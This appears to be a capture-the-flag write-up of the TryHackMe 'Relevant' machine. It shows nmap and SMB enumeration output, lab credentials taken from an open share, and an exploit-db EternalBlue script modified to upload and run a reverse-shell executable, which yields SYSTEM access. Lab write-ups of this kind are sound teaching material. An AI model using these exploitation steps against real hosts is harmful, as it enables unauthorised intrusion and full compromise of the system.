The Relevant briefing mentiones that everything can be completed without Metasploit. Since OSCP only allows very limited use of the Metasploit Framework I took this as a challenge. Below the relevant (pun intended) MITRE ATT&CK:
Reconnaissance
Starting the usual nmap scan results in the following ports being open:
1
2
3
4
5
6
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
rpc3389/tcp open ms-wbt-server
Visting the website shows the default static IIS page. So no obvious entrypoint yet, but that probably means that the configuration of the webserver is also default after installation. Looking at the HTTP headers we see that it is running the latest version of IIS. So no known vulnerabilities:
1
2
3
HTTP headers
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Continuing with enumaring SMB using nmap NSE scripts we get already some usefull information such as OS version, computername and sharenames:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Host script results:
| smb-enum-sessions:
|_ <nobody>
| smb-enum-shares:
| account_used: guest
| \\10.10.33.189\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.33.189\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.33.189\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: <none>
| Current user access: READ/WRITE
| \\10.10.33.189\nt4wrksv:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ/WRITE
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-08-05T08:44:28-07:00
Next I used the nmap NSE scripts to check for SMB vulnerabilities:
- ms10-054 (remote memory corruption), not vulnerable
- ms10-061 (print spooler service impersonation), not vulnerable
- ms17-010 (EternalBlue), vulnerable
Initial access
We found an entry point! The host is vulnerable for the EternalBlue exploit. I have already used this exploit with the help of Metasploit, which is pretty straight forward, but never without. A quick exploit-db search reveals a verified Python script by author Sleepya. In the first few lines the author comments a git link for a depedency for mysmb.py. After downloading this and installing Impacket I quickly ran into my first issue:
1
2
3
File "/TryHackMe/offensive-pentesting/relevant/mysmb.py", line 73, in puttrans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str
After hours of troubleshooting and Stackoverflow it was clear that the latest version of the impacket dependency was written for Python3, but mysmb.py is written in Python2. Eventually I decided to just downgrade impacket to the latest Python2 version (0.9.24). Only now I ran into my next issue:
1
impacket.smb.SessionError: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
The exploit does have an option to make authenicated SMB request, but of course this requires credentials… So where do fix us some credentials? Back to enumarating it is. First by starting Gobuster, but the usual wordlists do not reveal anything. Also an IIS specific wordlist leaved me empty handed.
Back to SMB, there was one non-default share nt4wrksv which is interesting. Connecting to it with the guest account works and there is one file in there named passwords.txt. Exactly what we need, what a coincidence! The file contains base64 encoded credentials. Below decoded:
1
2
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
Adjusting the script with the credentials works! It created an empty pwnd.txt file on the target host. With the help of a blog written by STRIK1R I adjusted the script to upload a reverse shell to connect back to my computer.
1
2
3
4
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
service_exec(conn, r'c:\test.exe')
All that remains is to escalate privileges and…no wait, we have the NT Authority\System account! The flags are now easily grabbed by going to the desktop folder for user Bob and Administrator.